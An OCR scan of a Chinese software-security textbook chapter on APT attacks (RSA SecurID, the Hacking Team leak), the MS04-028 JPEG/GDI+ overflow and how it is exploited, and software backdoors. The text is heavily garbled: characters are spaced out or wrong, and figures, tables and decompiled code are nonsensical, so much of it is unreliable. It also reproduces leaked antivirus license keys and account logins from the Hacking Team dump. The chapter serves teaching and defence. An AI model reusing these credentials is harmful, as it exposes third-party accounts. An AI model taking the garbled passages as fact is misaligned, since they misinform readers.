对 象 . 作 战 环境 、 指 挥 、 协 同等 方面 的 特殊 性 ,复杂 性 ,从 美国 网 络 空间 作战 发 展 历程 看 ,该 
条 令 颁 布 预示 着 其 网 络 战 融和 人 联合 作战 已 步 和 正轨 ,从 先期 透露 条 令 信息 落实 情况 分 析 ， 
民间 网 络 信息 共享 机 制 . 网 络 空间 司令 部 等 级 设置 .军种 相关 条 令 将 面临 调整 。 日 本 、 硕 
国 等 各 个 信息 技术 强国 也 都 在 发 展 自身 的 网 络 战 力量 。 而 恶意 软件 必然 是 实施 主动 攻 
击 \ 情 报 搜集 的 重要 手段 之 一 。 

因此 ,近年 来 曝光 的 恶意 软件 , 越 来 越 多 的 是 有 组 织 研发 ,采用 高 技术 手段 ,具有 很 强 
的 渗透 能 力 和 生存 能 力 , 并 且 一 般 都 具有 非常 明确 的 攻击 目标 ,不 会 随意 传播 。 这 种 针对 
特定 目标 .采取 高 技术 手段 的 攻击 .业界 也 将 其 称 为 高 可 持续 性 威胁 (Advanced 
Persistent Threat) ,简称 APT 攻击 。 最 经 典 的 APT 攻击 包括 攻击 伊朗 核电 站 的 震 网 里 
虫 ,攻击 RSA 公司 的 SecurID 窃取 攻击 等 。 

除了 病毒 .木马 等 经 典 的 恶意 软件 之 外 ,在 一 些 软件 产品 中 有 意 地 骨 入 一 些 窃取 用 户 
隐私 等 恶意 功能 的 软件 ,也 称 为 恶意 软件 。 这 一 类 软件 的 特点 是 对 于 用 户 来 说 ,他 看 到 的 
是 一 个 具备 正常 功能 的 软件 ,比如 游戏 .文字 编辑 .邮件 处 理 等 ,但 软件 在 欺骗 用 户 的 情况 
下 实施 了 一 些 破坏 功能 。 很 多 情况 下 ,对 于 一 个 功能 是 否 有 恶意 缺乏 客观 判断 标准 。 例 
如 2014 年 5 月 ,Replicant 团队 的 研究 人 员 发 现 多 款 三 星 手机 和 平板 存在 软件 后 门 。 该 
后 门 允 许 执行 Remote File System(RFS) 指 令 , 这 些 指令 可 以 读 写 手机 内 部 存储 。 研 究 
表明 ,在 一 些 三 星 设备 上 ,可 通过 适当 的 指令 读 取 甚 至 修改 用 户 的 隐私 数据 。 然 而 ,三 星 
公司 拒绝 修复 此 后 门 , 并 宣称 研究 人 员 错 误 地 理解 了 该 软件 的 设计 意图 。 因 此 ,对 于 这 样 
类 型 的 软件 很 难 简单 地 下 结论 ,判定 其 是 否 为 恶意 软件 。 

案例 一 : RSA 公司 遭受 SecurID 窃取 攻击 

1977 年 ,罗纳尔多 ， 里 弗 斯 特 (Ronald Rivest), fih + yh% /& CAdi Shamir) 和 里 昂 
纳 多 。 阿 多 乐 曼 (Leonard Adleman)3 位 学 者 提出 了 著名 的 RSA 公 钥 密码 算法 ,后 来 3 
人 又 一 起 于 1982 年 成 立 了 RSA 公司 (RSA Data Security), 2006 年 RSA 公司 被 EMC 
公司 收购 ,成 为 EMC 的 信息 安全 事业 部 。 目 前 ,RSA 公司 是 世界 级 信息 安全 解决 方案 的 
主要 提供 商 , 帮 助 世界 领先 企业 成 功 解决 最 复杂 敏感 的 安全 问题 。RSA 公司 的 用 户 涵 盖 
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了 政府 机 构 、 金 融 \ 军 工 等 重要 行业 企业 ,是 美国 政府 的 主要 安全 产品 提供 商 和 技术 服 
务 商 。 

据 报 道 ,2011 年 3 月 ,RSA 公司 遭遇 APT 攻击 ,攻击 者 成 功 盗 取 了 RSA 公司 的 
SecurID 等 相关 敏感 信息 ,直接 影响 到 4000 万 台 设 备 和 2. 5 亿 部 移动 终端 安全 。 根 据 相 
关 分 析 , 该 APT 攻击 的 基本 流程 如 图 1-3 所 示 。 


(5) 


0Day 攻 击 iex 收集 数据 窃取 信息 


钓鱼 邮件 与 









攻击 者 向 部 分 用 ”攻击 者 通过 植 入 

rcu Ta “Hik” 木马 
其 中 一 [对 用 户主 机 进行 

m 远程 访问 


攻击 代码 (CVE-0 
2011-0609) 


ey 


图 1-3 RSA SecurID 窃取 攻击 流程 


其 主要 攻击 步骤 如 下 : 

CD 攻击 者 通过 社交 工程 手段 针对 部 分 用 户 进行 信息 收集 ,信息 主要 来 自 社交 媒体 
(media sites)。 基 于 这 些 信息 ,攻击 者 在 两 天 时 间 内 分 别 向 两 个 不 同 的 小 组 发 送 了 两 封 
钓鱼 邮件 (这 两 个 小 组 并 非 重 要 部 门 ,也 不 掌握 有 价值 的 信息 )。 钓 鱼 邮 件 的 标题 是 
“2011 Recruitment Plan”, 并 带 有 一 个 Excel 附件 “2011 Recruitment plan. xls", iX 
Excel 附件 中 内 嵌 了 一 个 Flash 文件 ,该 Flash 文件 包含 恶意 代码 ,可 利用 漏洞 CVE- 
2011-0609。 该 漏洞 当时 是 0Day 漏洞 。 

(2) 收 到 邮件 的 两 个 小 组 中 的 一 位 用 户 从 垃圾 邮件 中 取出 了 这 封 邮 件 , 并 打开 了 附 
件 。 于 是 计算 机 被 感染 ,并 安装 了 后 门 , 即 反 向 连接 模式 的 远 控 木马 Poison Ivy。 

CD 攻击 者 开始 在 内 部 网 络 进行 横向 渗透 ,控制 越 来 越 多 的 服务 器 ,拥有 越 来 越 多 的 
访问 权限 ,最 终 渗 透 到 有 价值 的 攻击 目标 。 

(4) 攻击 者 从 所 有 被 攻陷 的 服务 器 上 收集 信息 ,将 感 兴趣 的 数据 加 密 压缩 ,转移 内 部 
接口 服务 器 (internal staging server) 上 ,准备 将 这 些 数据 传 出 。 

(5) 攻击 者 使 用 FTP 协议 ,将 这 些 加 密 压 缩 后 的 数据 从 内 部 接口 服务 器 传输 到 外 部 
接口 服务 器 (outside staging server) ,这 些 数 据 主 要 采用 加 密 RAR 文件 的 形式 。 外 部 接 
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口服 务 器 是 一 些 被 攻击 者 攻陷 的 外 部 主机 ,攻击 者 从 这 些 外 部 主机 上 拉 取 并 删除 数据 ,以 
掩盖 攻击 痕迹 ,使 自身 难以 被 追踪 。 

攻击 者 可 以 利用 获得 的 SecurID 信息 伪造 RSA 公司 客户 的 数字 身份 信息 ,进一步 对 
相关 的 组 织 机 构 实 施 入 侵 。 

案例 二 : Hacking Team 遭受 APT 攻击 

总 部 位 于 意大利 的 软件 开发 商 Hacking Team 因 依 托 政府 后 台 , 大 力 研 发 .销售 监控 
软件 而 备 受 用 户 争议 ,是 技术 实力 雄厚 、 专 门 从 事 入 侵 的 企业 之 一 。2015 年 7 月 5 日 ， 
Hacking Team 遭遇 了 大 型 数据 攻击 泄露 事件 ,大 量 的 内 部 数据 被 窃取 。 同 时 , Hacking 
Team 的 官方 Twitter 被 “ 黑 ”, 官 方 主页 面 的 标语 更 名 为 “Hacked Team”。 此 外 ,攻击 者 
将 获得 的 内 部 消息 通过 被 害 者 Hacking Team 的 Twitter 公布 于 众 。 

这 次 泄露 的 数据 信息 包括 以 下 5 类: 

CD 各 种 零 日 漏洞 和 相关 漏洞 利用 代码 。 

在 Hacking Team 泄露 的 文件 中 ,包含 两 个 Flash 的 漏洞 利用 代码 。 其 中 一 个 是 
Flash 的 ODay 漏洞 : ActionScript ByteArray Buffer Use After Free, 另 一 个 是 Nicolas 
Joly f£ Pwn2Own 2015 大 赛 中 使 用 的 CVE-2015-0349。 为 了 在 IE 和 Chrome 上 绕 过 其 
沙 盒 机 制 完 全 控制 用 户 系 统 , Hacking Team 还 利用 了 一 个 Windows 中 的 内 核 驱 动 
Adobe Font Driver(atmfd. dll) 中 存在 的 一 处 字体 Oday 漏洞 ,实现 权限 提升 并 绕 过 沙 盒 
机 制 。 该 0Day 漏洞 可 以 用 于 Windows XP 到 Windows 8. 1 系统 ,x86 和 x64 平台 都 受 
影响 。 

(2) 远程 控制 平台 。 

即 我 们 常 说 的 木马 ,该 平台 具备 了 对 Android 系统 、iOS & Mac OS 系统 、Windows 
系列 系统 等 不 同 操作 系统 平台 的 监控 能 力 。 

针对 OS 系统 ,主要 包括 3 个 工具 。Q@core-ios-master. zip 里 面包 括 一 个 利用 dylib 
注入 对 用 户 输入 、GPS、 屏 幕 等 信息 进行 监控 的 木马 ;ios-newsstand-app 文件 夹 是 一 个 通 
过 替换 OS 系统 的 输入 法 进行 键盘 记录 的 木马 ,该 木马 同时 包含 一 个 Keybreak 文件 夹 ， 
其 中 有 破解 手机 锁 屏 密码 的 程序 。@ 名 为 vector-ipa-master. zip 的 底层 网 络 代理 程序 ， 
可 以 用 来 监控 或 者 控制 系统 的 网 络 流量 。@ 名 为 core-macos-master. zip 的 Mac OS X 
马 , 该 木马 的 功能 与 Windows 的 木马 非常 相似 。 

针对 Windows 的 木马 名 为 core-winphone-master. zip。 该 木马 利用 系统 上 的 一 个 
0Day, 在 WP 设备 上 实现 “激活 追踪 ”, 允 许 第 三 方 代码 程序 像 受 信任 程序 一 样 执行 。 该 
木马 还 可 以 获取 联系 人 日历 通话、 地理 位 置 短信、 传感器 状态 等 信息 。 

此 外 ,还 包括 黑莓 和 塞 班 的 远程 控制 木马 系统 core-blackberry-master. zip 和 core- 
symbian-master. zip. 

(3) Fuzz 测试 系统 。 

这 次 泄露 的 Fuzz 测试 系统 主要 包含 两 个 工具 : fuzzer-windows-master. zip 主要 保存 
了 Windows 下 的 Fuzzer 源码 ,里面 有 针对 IE 和 字体 的 Fuzzer 测试 系统 ;fuzzer-android- 
master. zip 主要 保存 了 Android 下 的 Fuzzer 源码 。 里 面 有 针对 JPG、SMS 和 System Call 
的 Fuzzer 测试 系统 。Trinity 主要 用 来 做 System Call Fuzzer, 如 binder 使 用 的 ioctl() 系 统 
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调用 。 

(4) 恶意 代码 检测 系统 。 

包括 AVMonitor 一 代 、 二 代 等 。 其 中 ,testrav-master. zip 是 第 一 代 产 品 。test-av2- 
master. zip 是 第 二 代 产 品 。 该 系统 主要 用 来 做 查 杀 检 测 ,通过 调用 杀毒 软件 扫描 自己 编 
写 的 木马 和 攻击 程序 ,根据 扫描 结果 对 代码 进行 修改 ,保证 产品 可 以 通过 检测 。test-av2- 
master, zip\test-av2-master\doc\AVTEST Box. xlsx 保存 了 Hacking Team 使 用 的 杀毒 
软件 的 列表 和 序列 号 ,如 图 1-4 所 示 。 


从 Hacking Team 泄 汕 出 的 部 分 杀毒 软件 信息 示例 
Kaspersky Antivirus 2013 VOSEB-Z8ADZ-989BY -NYCDY 
Panda Internet Security 2013 BLFCNJ-86837047 
Gdata Internet Security 2013 ITIUE-NTYLC-TPTIN-USZVI-CNVEE 
Trend Micro Titanium PERF -0012-0356-5855-6910 
PCTools Internet Security 2013 名 93-286D-94FA-CF53-1AED-554A-8CD9-8A4F-EOD2-AD37 
Norton Internet Security 2013  J4bJ4RHFGGPYNISGBE4CH22T 


Avira Internet Security 2013 38VVV-VVVY8-65B84-8FQCN-VP3D3 

win7drweb DrWeb 'SIVR-GNTT-T46G-VTRA 
winTfsecure F-Secure Internet Security GJR2-B8FK-WC3J-0P9D-JZ5N 

winTeset ESET Smart Security Username: EAV-69756437 Password: nêrn1Tc88e 

winTavg AVG Internet Security 2013 INWER -USZIE-T ABPT -GNHIX-AEHTN-FDAYN 
winTmcafee McAfee Antivirus 2013 Login with d milanfhackingtesm com / ht123456 
winTavast Avast Internet Security 2013 File attached 

winTbitdef Bit Defender XVEPNE 


图 1-4 泄露 的 恶意 代码 检测 系统 信息 





(5) 其 他 资料 。 

包括 各 种 证 书 、Key 以 及 其 内 部 会 议 等 资料 ,例如 Hacking T 的 GeoTrust 证书. 大 
量 的 录音 以 及 Hacking T 在 自己 的 产品 中 留 下 SQL 后 门 的 相关 信息 。 此 外 还 包括 虚拟 
机 保护 党 VMProtect Professional 的 很 多 正版 Key 等 。 在 泄露 的 资料 中 可 以 找到 
Hacking 工 的 客户 名 单 ,甚至 包括 美国 的 FBI, 共 涉及 41 871 712 欧元 的 生意 ,如 图 1-5 
所 示 。 









































用 户 国家 地 区 | 代理 商 初始 销售 年 份 年 度 维 护 费 用 客户 局 收入 
Vietnan GD1 Tien — [enc [ra 215 € sten 
Vietnan G08 Vistaan — (aac | € mio 
Ss Webskistan | Barce [Intelligence 2011 € 0,000 € 917,008 
m [y Worth America | TEA zn € 100,05 € eno 
[7 [3 Torth dxerica [Other En E 9,000 E s 
on vsa North America | LEA zn € 190,000 
DAE -Intelitenpe ms Lj [oner zu € 150,05 € 1.20,00 
Ui ~ aor "ui 加 jm zn € 20,009 € 63,500 
Taskish National Felice Turkey [Barpo ju xn € 45,000 € 440,000 
Reyal That arny Tatland [ec jus E € anoo 
Dept, sf Corresticn Thai Police Thailand [iac jus aas € eno» € san 
Kantonspolizei Zurich Svitzerland | urepe [ia 204 € 405, £00 
MIS ~ Natonal Totelligmes wa Security Servicer | sot: — |a [mesttieence [a2 EET € on, 
cu Spain arepe [intelligence 2006 € eno» € 538,000 
TDA So Sinemere [ADAC [Intellieencs 2X6 EX € meer 
seus - am Smti E [ma 212 € ngo € nao 














图 1-5 泄露 的 其 他 资料 


泄露 的 资料 涉及 的 主要 国家 包括 埃及 埃塞俄比亚、 摩洛哥 .尼日利亚 、 苏 丹 、 智 利 、 哥 
伦比 亚 \ 厄 瓜 多 尔 、 洪 都 拉 斯 墨西哥 .巴拿马 .美国 .阿塞拜疆 、 哈 萨克斯 坦 、 马 来 西亚 、 蒙 
十, 新加坡、 韩国 泰国 、 乌 兹 别克 斯 坦 . 越 南 、 澳 大 利 亚 、 塞 浦 路 斯 捷克 、 德 国 、 匈 牙 利 、 意 
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大 利 、 卢 森 堡 ,波兰 ,俄罗斯 .西班牙 .瑞士 巴林、 阿曼、 沙特 阿拉 伯 、 阿 联 靖 等 。 

从 以 上 案例 可 以 看 出 ,有 组 织 地 开展 的 APT 攻击 防不胜防 。RSA 公司 是 世界 著名 
的 防御 型 公司 , Hacking Team 是 技术 实力 雄厚 、 以 擅长 入 侵 闻 名 的 公司 , 却 都 遭受 了 
APT 攻击 ,并 造成 了 严重 的 损失 。 而 这 些 攻 击 过 程 均 综合 应 用 了 多 种 恶意 软件 ,包括 谍 
有 恶意 代码 的 数据 文档 ,利用 未 知 漏洞 植 人 木马 ,木马 潜伏 并 进一步 扩散 组 织 小 规模 的 伪 
尸 网 络 ,进一步 扩大 范围 ,搜集 数据 窃取 情报 。 


122 软件 漏洞 


软件 漏洞 是 指 由 于 程序 设计 实现 错误 造成 的 软件 问题 。 攻 击 者 利用 软件 漏洞 往往 可 
以 造成 程序 崩溃 ,获取 敏感 数据 或 执行 任意 代码 。 软 件 漏 洞 是 当前 互联 网 的 主要 威胁 之 
一 ,是 病毒 感染 、 蠕 虫 传播 .APT 攻击 渗透 等 攻击 实施 的 重要 基础 ,因此 ,软件 漏洞 一 直 是 
网 络 安全 领域 的 热点 问题 。 为 了 消除 软件 漏洞 ,学 术 界 、 产 业界 都 做 了 大 量 努 力 ,从 设计 
开发 更 安全 的 编程 语言 ,编译 器 ,到 设计 更 科学 的 软件 开发 过 程 ,再 到 开发 代码 检测 ,测试 
验证 等 后 期 检测 工具 等 。 这 些 工 作 也 在 很 大 程度 上 发 挥 了 作用 ,消除 了 一 些 典 型 的 栈 洪 
出 等 漏洞 。 但 从 目前 已 发 现 的 软件 漏洞 情况 来 看 ,当前 要 彻底 消除 软件 漏洞 仍然 是 困难 
的 。 这 主要 是 由 于 以 下 原因 : 

CD 软件 自身 越 来 越 复杂 。 当 前 的 软件 系统 ,无 论 是 从 代码 规模 、 功 能 组 成 还 是 涉及 
的 技术 均 越 来 越 复 杂 , 其 带 来 的 直接 结果 就 是 从 软件 的 需求 分 析 到 概要 设计 ,再 到 详细 设 
计 , 直 到 具体 的 编码 实现 , 均 无 法 做 到 全 面 的 安全 性 论证 ,不 可 避免 地 会 在 结构 、 功 能 、 代 
码 等 不 同 层面 存在 设计 错误 的 可 能 。 

(2) 软件 漏洞 越 来 越 多 样 化 。 随 着 各 种 新 技术 的 引入 ,使 得 软件 漏洞 的 形态 也 越 来 
越 多 样 化 ,从 最 初 的 栈 溢出 、 堆 溢出 等 溢出 型 漏洞 ,到 Web 的 跨 站 脚本 、SQL ik A SEE JR 
型 漏洞 ,再 到 像 HeartBleed 这 样 的 敏感 数据 泄露 漏洞 等 。 软 件 漏洞 多 样 化 带 来 的 直接 影 
响 就 是 当前 仍 无 法 全 面 、 准 确 地 描述 “什么 是 软件 漏洞 ,进而 在 软件 的 代码 检测 、 软 件 测 
试 等 过 程 中 也 无 法 设计 开发 有 针对 性 的 检测 方法 和 检测 工具 。 

(3) 软件 开发 周期 越 来 越 短 ,造成 现实 中 软件 产品 漏洞 频 出 。 由 于 市 场 竞 争 激烈 , 软 
件 产品 的 开发 周期 也 越 来 越 短 ,造成 在 设计 验证 .产品 测试 等 过 程 环节 的 精力 投入 越 来 越 
少 ,不 可 避免 地 会 引入 更 多 的 软件 漏洞 。 

下 面 通 过 经 典 的 JPEG 漏洞 MS 04-028 案例 讲述 漏洞 利用 的 基本 过 程 。 

案例 一 : JPEG 漏洞 (MS 04-028) 

JPEG 图 像 格式 由 联合 照片 专家 组 (Joint Photographie Experts Group) 开 发 并 命名 
为 ISO 10918-1, 俗 称 JPEG 格式 ,是 目前 使 用 最 为 普遍 的 文件 格式 之 一 。2004 年 ,发 现 
T Windows 系列 操作 系统 存在 的 JPEG 漏洞 ,微软 编号 为 MS 04-028。 该 漏洞 发 现 至 今 
已 有 十 余年 ,选择 其 作为 示例 ,主要 有 以 下 考虑 : 其 一 ,这 个 漏洞 很 具 代 表 性 ,攻击 者 可 以 
利用 其 执行 任意 代码 , 现 有 的 很 多 漏洞 虽然 具体 机 理 不 同 ,但 大 致 的 利用 模式 较为 相似 ; 
其 二 ,这 个 漏洞 在 最 初 发 现时 改变 了 很 多 人 传统 的 网 络 安全 认识 ,具有 划时代 的 意义 ;其 
三 ,大 多 数 人 对 JPEG 图 像 比较 熟悉 ,有 助 于 理解 这 种 利用 模式 。 

GDI 十 是 Windows 系列 操作 系统 的 一 个 子 系统 , 它 主要 用 于 处 理 系 统 的 图 像 绘制 消 
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息 ,在 操作 系统 中 , 它 被 封装 成 一 个 独立 的 类 ,各 类 应 用 程序 只 需要 调用 标准 的 图 形 接口 ， 
即 可 完成 相应 的 图 形 绘制 操作 。 由 于 图 形 界面 使 用 的 普遍 性 ,基本 上 所 有 的 Windows 平 








台 软 件 都 离 不 开 GDI 十 模块 。 
首先 以 漏洞 样本 为 例 , 简 要 介绍 JPEG 格式 ,漏洞 样本 的 头 部 数据 如 图 1-6 所 示 。 

0000h: MM FF £0 00 10 4A 46 49 46 00 01 02 00 oo 64  BMilvi..crir..... d 
0010h: 00 64 00 00 «d. .| 
0020h: 
0030h: FF FE 00 01 00 14 10 10 19 ANS... 
0040h: 12 19 27 17 17 27 32 EB OF 26 32 DC B1 E7 70 26 "26. TEE 
0050h: 2E 3E 35 35 35 35 35 3E E8 00 00 00 00 SB 8D 8B 1$ss5ssé.... [e 
0060h: 00 OS 00 00 83 C3 12 C6 03 90 43 3B D9 75 F8 44 | ....fÀ.E..C;ÜuaD 


0070h: 44 44 44 44 44 44 44 44 44 44 44 44 01 15 19 19 | DDDDDDDDDDDD.... 


图 1-6 漏洞 样本 头 部 数据 


JPEG 图 像 由 多 个 子 结构 组 合 而 成 ,文件 头 为 2B 的 起 始 标志 (FFD8) ,文件 尾部 为 2B 
的 结束 标志 (FFD9) ,中 间 数 据 由 子 结构 组 成 。 子 结构 具有 统一 的 格式 模板 :“2B 的 标记 
码 十 2B 的 长 度 域 十 信息 数据 ,长 度 域 为 “大 端 格 式 ”。 图 中 的 头 两 个 字 节 是 标记 码 SOI 
(Start Of Image) 表 示 图 像 的 开始 ,其 中 FF 表示 标记 码 的 开始 ,后 面 不 同 的 值 具有 不 同 
的 含义 ， 为 SOI 的 标记 。SOI 标记 码 后 面 紧 跟 图 像 压缩 信息 结构 , 共 12B, 记 录 图 像 压 
缩 信息 结构 称 为 App0。 跟 在 Appo 后 面 的 是 App12(FFEC) 和 App14(FFEE) 结 构 ， 
SR 但 随后 的 M_JPG14(FFFE) 结 构 的 长 度 域 为 1, 由 于 长 度 
域 描述 的 是 包含 “长 度 域 " 和 “数据 域 ” 的 字 节 数 ,最 小 值 为 2, 样 本 中 的 1 是 错误 的 字段 ， 
该 字段 所 处 文件 偏 移 位 置 为 0x39、0x3a 这 两 个 字 节 。 
通过 动态 分 析 和 静态 分 析 可 以 发 现 ,GDI 十 在 处 理 错误 的 长 度 字段 时 未 经 判定 ,直接 
将 “长 度 值 ?1 减 去 2, 得 到 数据 域 长 度 值 为 负 值 。 如 图 1-7(a) 所 示 ,变量 v20 为 长 度 域 , 读 
取 自 文件 ,加 载 样本 数据 时 值 为 1, 减 2 之 后 得 到 一 1, 赋 值 给 变量 v13。 在 越界 检查 时 ， 
v13 作为 有 符号 数 一 1, 检 测 长 度 小 于 v15, 未 发 生 越 界 ; 但 是 当 作 长 度 做 数据 复制 时 , 转 成 
无 符号 的 Oxffffffff ,导致 越界 复制 溢出 ,并 将 长 度 字 段 后 续 的 包括 shellcode 在 内 的 数据 
复制 到 了 精心 构造 的 位 置 。 图 1-7(b) 是 打 补 丁 后 的 反 编译 代码 ,添加 了 长 度 域 v21 是 否 
大 于 2 的 判断 ,保证 减 2 之 后 得 到 的 v14 为 正 数 。 





B iren 
55| 《 





) 
| wile(1) 





























68| 
69| w = *( DVORD «)(uh + 28); 
79 *( DWORD «)(vih + &); 
训 dece» em) 
5 
73| expo 22, eleonst void see) + 20), 01395 
zaf (ot 《US e 29) 79 
75| e*t [ey *)(*( DvonD hs "Y * EM € 2 
T6 LABEL 36: 到 
n" De 到 -— 
78| ," LABEL 5 5| » 
?中 76l 
(a) 打 补丁 前 () 打 补丁 后 


图 1-7 漏洞 位 置 补丁 前 后 反 编译 代码 对 比 
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漏洞 利用 过 程 如 图 1-8 所 示 ,首先 整数 溢出 得 到 超 长 的 复制 长 度 , 数 据 复 制 出 现 越界 
读 写 ,将 构造 好 的 shellcode 等 数据 复制 覆盖 到 其 他 结构 区 域 ,包括 X 函数 的 指针 , 紧 接 着 
在 内 存 [Lesij 不 可 读 的 情况 下 进入 错误 处 理 流程 。 错 误 处 理 完 之 后 回 到 程序 执行 流程 , 通 
过 精心 构造 ,诱导 程序 调用 X. 函数 ,而 X 函数 的 指针 被 覆盖 劫持 ,指向 了 内 存 中 布局 好 的 
shellcode, 触 发 了 shellcode 的 执行 。 


复制 长 度 
二 


2 











附属 信息 :辅助 数据 fshellcode 








图 1-8 漏洞 利用 过 程 示意 图 


123 软件 后 门 


软件 后 门 是 指 软件 开发 人 员 有 意 设计 ,刻意 对 用 户 隐瞒 的 一 些 功 能 ,往往 这 些 功 能 用 
于 软件 产品 应 用 之 后 的 一 些 特殊 目的 。 早 期 的 软件 后 门 包括 输入 特定 指令 ,完成 特殊 的 
功能 。 例 如 ,校园 电话 输入 特殊 号 码 之 后 就 可 以 免费 打 电 话 。 但 这 一 类 软件 后 门 在 设计 
上 特别 明显 ,往往 容易 被 发 现 。 特 别 是 在 当前 各 类 分 析 手 段 出 现 之 后 ,采取 这 种 机 制 的 软 
件 后 门 会 被 直接 追究 相关 的 法 律 责任 。 

前 面 提 到 ,软件 漏洞 不 易 被 检测 到 ,而 危害 很 直接 ,甚至 可 以 执行 任意 的 攻击 代码 。 
因此 ,一些 软 件 开发 者 (或 软件 开发 商 ) 将 软件 后 门 设计 为 软件 漏洞 的 形式 。 采 取 这 种 方 
案 对 于 攻击 者 而 言 具 有 如 下 优势 : 

CD 难 发 现 。 就 目前 的 软件 漏洞 分 析 和 检测 技术 而 言 , 要 对 一 个 大 规模 的 软件 产品 
进行 全 面 的 软件 漏洞 检测 仍然 是 困难 的 ,更 不 用 说 去 检测 一 个 开发 者 有 意 设 计 的 软件 
漏洞 。 

(2) 易 利 用 。 利 用 软件 漏洞 可 以 绕 过 系统 的 各 种 安全 机 制 , 当 软件 产品 开发 者 有 意 
设计 一 个 软件 漏洞 作为 后 门 时 ,其 可 以 充分 利用 软件 产品 的 权限 和 资源 , 绕 过 系统 的 各 种 
安全 防护 和 安全 检测 机 制 。 

(3) 难 取 证 。 后 门 功能 所 需 代码 均 不 在 软件 产品 代码 中 ,是 攻击 者 利用 漏洞 动态 载 
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入 的 ,而 即使 漏洞 被 发 现 ,后 门 的 设计 者 也 可 以 简单 地 解释 为 程序 的 一 个 设计 错误 ,很 难 
有 直接 的 证 据 证 明 该 漏洞 为 后 门 。 

所 以 ,软件 产品 中 ,以 漏洞 形式 存在 的 后 门 也 是 目前 软件 产品 中 的 重要 安全 威胁 之 
一 ,在 某 种 程度 上 是 比 一 般 性 的 软件 漏洞 更 严重 的 威胁 。 一 般 性 的 软件 漏洞 相当 于 坚固 
的 城墙 上 存在 一 些 薄 弱点 ,但 攻防 双方 都 不 知情 , 谁 先 发 现 就 对 谁 有 利 , 是 一 种 技术 能 力 
的 竞争 ;而 以 漏洞 形式 存在 的 后 门 ,相当 于 城墙 的 建设 人 员 被 买通 ,直接 在 城墙 上 开 了 一 
个 非常 隐蔽 的 暗道 ,防护 者 不 知情 ,很 难 发 现 , 而 设置 暗道 的 人 却 一 清二 楚 。 

2010 年 底 ,OpenBSD 的 前 开发 人 员 Gregory Perry 声称 ,其 在 10 年 前 接受 了 FBI 的 
资金 ,在 OpenBSD 的 实现 代码 中 植 和 后门 ,以 便 美 国 的 国家 安全 部 门 能 够 在 网 络 中 监听 
相关 的 加 密 通 信 。2013 年 底 , 斯 诺 登 曝光 的 机 密 文件 显示 ,美国 国家 安全 局 给 予 RSA 相 
关 资 金 , 要 求 其 在 相关 的 软件 产品 BSafe 中 使 用 安全 强度 更 低 的 加 密 算法 ,以 确保 美国 国 
家 安全 部 门 在 需要 时 可 破解 相关 文件 。 

而 从 另 一 个 侧面 可 以 注意 到 ,美国 也 在 关注 这 些 问题 的 检测 和 发 现 , 美 国 DARPA 专 
门 支持 了 BET(Binary Executable Transforms) 和 VET(Vetting Commodity IT Software 
and Firmware) 项 目 , 用 于 软件 产品 的 检测 ,特别 强调 是 不 依赖 于 源 代 码 的 , 即 针 对 无 法 掌 
握 源 代码 的 软件 产品 。 其 中 VET 项 目 还 专门 指出 要 具备 对 IT 产品 中 看 似 无 意 造成 的 
漏洞 (accidental-seeming) ,功能 上 可 能 存在 的 负面 作用 ,以 及 在 对 手 恶意 坎 骗 的 情况 下 的 
漏洞 .恶意 行为 的 分 析 检 测 能 力 。 

从 以 上 分 析 可 以 看 出 ,以 软件 漏洞 形式 存在 的 后 门 危害 严重 ,取证 困难 ,如 何 进行 有 
效 防御 将 是 软件 安全 的 重要 热点 问题 之 一 。 


1.3 软件 安全 性 分 析 的 目标 


前 面 提 到 的 软件 安全 问题 ,无 论 是 APT 攻击 中 采用 的 恶意 代码 ,还 是 软件 漏洞 、 软 
件 后 门 ,由 于 没有 直接 的 相关 特征 ,要 实现 完全 自动 化 ,智能 化 的 检测 是 困难 的 。 对 于 软 
件 安全 性 的 评估 仍 主要 在 各 种 技术 手段 的 帮助 下 ,借助 人 的 经 验 和 判断 进行 相关 分 析 工 
作 。 但 无 论 是 针对 恶意 软件 还 是 软件 漏洞 或 软件 后 门 , 软 件 安全 性 分 析 一 般 要 回答 以 下 
三 方面 的 问题 : 

CD 存在 问题 , 即 目标 软件 中 是 否 存在 恶意 功能 ,是 否 存在 漏洞 或 者 后 门 。 这 是 评估 
一 个 软件 安全 性 的 首要 问题 。 该 问题 虽然 简单 ,但 回答 却 并 不 容易 。 例 如 ,APT 攻击 中 
的 恶意 软件 会 采取 各 种 手段 进行 自我 保护 ,以 绕 过 当前 的 各 种 检测 机 制 ; 一 些 软件 产品 中 
嵌入 的 恶意 功能 一 般 也 会 刻意 隐藏 ;而 关于 软件 漏洞 检测 困难 问题 ,前 面 已 有 讨论 ,就 不 
FIOR. 

(2) 机 理 问 题 , 即 确定 问题 存在 之 后 ,进一步 分 析 其 具体 是 如 何 实现 的 或 者 是 什么 原 
因 造成 的 。 例 如 ,对 于 恶意 软件 ,需要 明确 它 具 体 如 何 操控 ,如 何 实现 相应 的 破坏 功能 ;对 
于 软件 漏洞 ,需要 确定 程序 错误 的 原因 ,具体 程序 出 错 的 异常 点 ,以 及 程序 异常 与 程序 输 
入 之 间 的 关系 等 。 

G) 对 策 问 题 , 即 根据 其 相关 机 理 分 析 结 果 ,提出 相应 的 防御 对 策 。 例 如 ,提取 恶意 
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软件 相应 的 特征 ,更 新 杀毒 软件 特征 库 , 实 现 对 该 恶意 软件 的 检测 能 力 ; 设 计 恶 意 软件 的 
清除 办 法 ,确保 已 感染 系统 能 够 安全 有 效 清除 恶意 软件 ;对 于 软件 漏洞 或 者 后 门 ,一 方面 
是 设计 开发 相关 的 补丁 程序 ,快速 地 给 相关 系统 打 补 丁 , 另 一 方面 也 可 以 针对 漏洞 利用 过 
程 的 特点 ,研究 漏洞 的 利用 方法 ,进而 总 结 漏洞 利用 的 特征 ,完善 杀毒 软件 或 人 侵 检 测 系 
统 ,确保 该 漏洞 或 后 门 不 被 利用 。 

本 书 中 所 提 到 的 软件 分 析 , 主 要 是 在 没有 源 代码 的 情况 下 ,针对 可 执行 代码 的 分 析 ， 
这 主要 是 基于 现实 考虑 ,无 论 是 恶意 软件 还 是 流行 的 软件 产品 ,常常 都 无 法 获取 源 代码 。 
而 在 没有 源 代码 支持 的 情况 下 ,对 软件 的 逆向 分 析 存 在 以 下 挑战 ， 

(1) 指令 代码 的 理解 。 无 论 是 可 执行 文件 中 还 是 执行 序列 中 ,各 种 指令 数量 规模 大 
大 超出 了 人 的 理解 分 析 能 力 , 从 这 些 大 规模 、 琐 碎 的 机 器 指令 中 形成 分 析 人 员 更 容易 理解 
的 操作 语义 ,仍然 是 困难 的 。 

(2) 关联 关系 的 抽取 。 操 作 与 操作 之 间 存 在 数据 传递 .数值 计算 等 各 种 关联 关系 ,如 
